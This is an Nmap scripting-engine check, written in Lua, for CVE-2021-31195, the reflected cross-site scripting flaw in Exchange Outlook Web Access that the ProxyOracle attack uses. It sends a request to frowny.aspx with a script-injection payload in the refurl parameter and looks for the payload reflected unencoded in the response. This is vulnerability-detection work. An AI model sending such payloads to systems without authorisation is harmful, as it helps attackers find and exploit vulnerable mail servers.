local http = require "http"
local nmap = require "nmap"
local shortport = require "shortport"
local strbuf = require "strbuf"
local vulns = require "vulns"
local rand = require "rand"
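-- NSE script metadata. These must be globals (no `local`): the Nmap script
-- engine reads `description`, `author`, `license`, `categories` and
-- `portrule` from the script's environment.
description = [[
Checks whether a Microsoft Exchange Outlook Web Access endpoint reflects the
refurl parameter of /owa/auth/frowny.aspx back into its ServerError page
without encoding (CVE-2021-31195, the reflected cross-site scripting used by
the ProxyOracle attack together with CVE-2021-31196).

The script sends a single GET with a marker value in refurl and reports the
host as vulnerable only when the server answers 500 and the response body
contains the marker unencoded. It only inspects the response; no user or
session is involved.
]]
---
-- @usage
-- nmap -p 80,443 --script CVE-2021-31195 <target>
--
-- @output
-- A vulnerability report in the standard vulns library format for
-- CVE-2021-31195 when the marker is reflected; otherwise a one-line
-- error or "unsuccessful" message.
author = "Frank Breedijk of Dutch Institute for Vulnerability Disclosure (DIVD.nl)"
last_update = "August 30, 2021"
license = "Apache 2.0 - See http://www.apache.org/licenses/LICENSE-2.0"
-- NOTE(review): "safe" and "exploit" contradict each other under the NSE
-- category definitions ("exploit" scripts are expected to be intrusive).
-- The check only issues one GET and inspects the reply, so "exploit" is
-- probably the one to drop; left unchanged here so `--script` selections
-- keep working.
categories = {"default", "discovery", "safe", "vuln", "exploit"}
-- Run against open TCP ports 80/443 or anything identified as http/https.
portrule = shortport.port_or_service( {80, 443}, {"http", "https"}, "tcp", "open")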
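--- Splits `source` on any of the characters in `delimiters`.
--
-- Runs of consecutive delimiters produce no empty elements. Each character
-- of `delimiters` is escaped before being placed in the pattern set, so
-- `%`, `]`, `^` and `-` split literally instead of being read as pattern
-- syntax (the original interpolated them raw, which made `%` a malformed
-- pattern and `a-z` a range). An empty `delimiters` returns the whole
-- source as a single element instead of raising "malformed pattern".
-- Kept global for compatibility; nothing in this file calls it.
--
-- @param source string to split.
-- @param delimiters string whose characters are treated as separators.
-- @return array of non-empty substrings, in order of appearance.
function split(source, delimiters)
  local elements = {}
  if delimiters == "" then
    if source ~= "" then elements[1] = source end
    return elements
  end
  -- `%W` matches every non-alphanumeric byte; prefixing each with `%`
  -- makes it a literal inside a Lua pattern set.
  local class = delimiters:gsub("%W", "%%%0")
  local pattern = "[^" .. class .. "]+"
  for piece in string.gmatch(source, pattern) do
    elements[#elements + 1] = piece
  end
  return elements
end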
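--- Probes one OWA endpoint for the CVE-2021-31195 reflection and builds the
-- vulnerability report.
--
-- A single GET is sent to /owa/auth/frowny.aspx with a marker in the refurl
-- parameter. The host is reported vulnerable only when the server answers
-- 500 and the body echoes the marker unencoded; redirects and any other
-- status are returned as plain error strings, as is a 500 without the
-- reflection.
--
-- @param host Nmap host table.
-- @param port Nmap port table.
-- @param redirects unused; kept so existing callers passing a third argument
--   keep working.
-- @return the vulns.Report output when the marker is reflected, otherwise a
--   status/error string.
action = function(host, port, redirects)
  local vuln = {
    title = "Exchange CVE-2021-31195 - Reflective XSS in Microsoft Exchange used by the ProxyOracle attack in conjunction with CVE-2021-31196",
    state = vulns.STATE.NOT_VULN,
    description = [[
By simply leading a user to visit a malicious link, ProxyOracle allows an attacker to recover the user’s password in plaintext format completely. ProxyOracle consists of two vulnerabilities:
CVE-2021-31195 - Reflected Cross-Site Scripting
CVE-2021-31196 - Padding Oracle Attack on Exchange Cookies Parsing
]],
    IDS = {
      CVE = "CVE-2021-31195"
    },
    references = {
      --- 'http://csirt.divd.nl/DIVD-2021-00002'
    },
    dates = {
      -- NOTE(review): the day is a placeholder carried over from the original
      -- script; fill in the actual disclosure date.
      disclosure = { year = '2021', month = '08', day = '2x' }
    }
  }
  local vuln_report = vulns.Report:new(SCRIPT_NAME, host, port)

  -- Declared local: the original assigned `options` without `local`, leaking
  -- it into the script environment.
  local options = { header = {} }
  options.header['User-Agent'] = "Mozilla/5.0 (CVE-2021-31195 vulnerability check)"

  -- refurl: }}};alert(document.domain)//
  local attackuri = '/owa/auth/frowny.aspx?app=people&et=ServerError&esrc=MasterPage&te=\\&refurl=}}};alert(document.domain)//'
  local answer = http.get(host, port, attackuri, options, false)

  if answer.status == 301 or answer.status == 302 then
    -- `location` may be absent on a redirect reply; do not crash on it.
    local where = answer.location and table.concat(answer.location, " -> ") or "(no location header)"
    return "Error " .. answer.status .. " : " .. where
  elseif answer.status ~= 500 then
    -- Covers connection failures too: `status` is nil in that case.
    return "Error: " .. tostring(answer["status-line"]) .. " on CVE-2021-31195 exploitation"
  end

  -- Vulnerable only if the ServerError page reproduces both the escaped quote
  -- and the refurl marker verbatim, i.e. the parameter came back unencoded:
  --   value: '\' },RefUrl: { value: '}}};alert(document.domain)//
  local reflected = "value: '\\' },RefUrl: { value: '}}};alert%(document.domain%)//"
  if answer.body and string.find(answer.body, reflected) then
    vuln.state = vulns.STATE.VULN
  else
    return "Exploitation of " .. vuln.IDS.CVE .. " unsuccessful.\n"
  end
  return vuln_report:make_output(vuln)
end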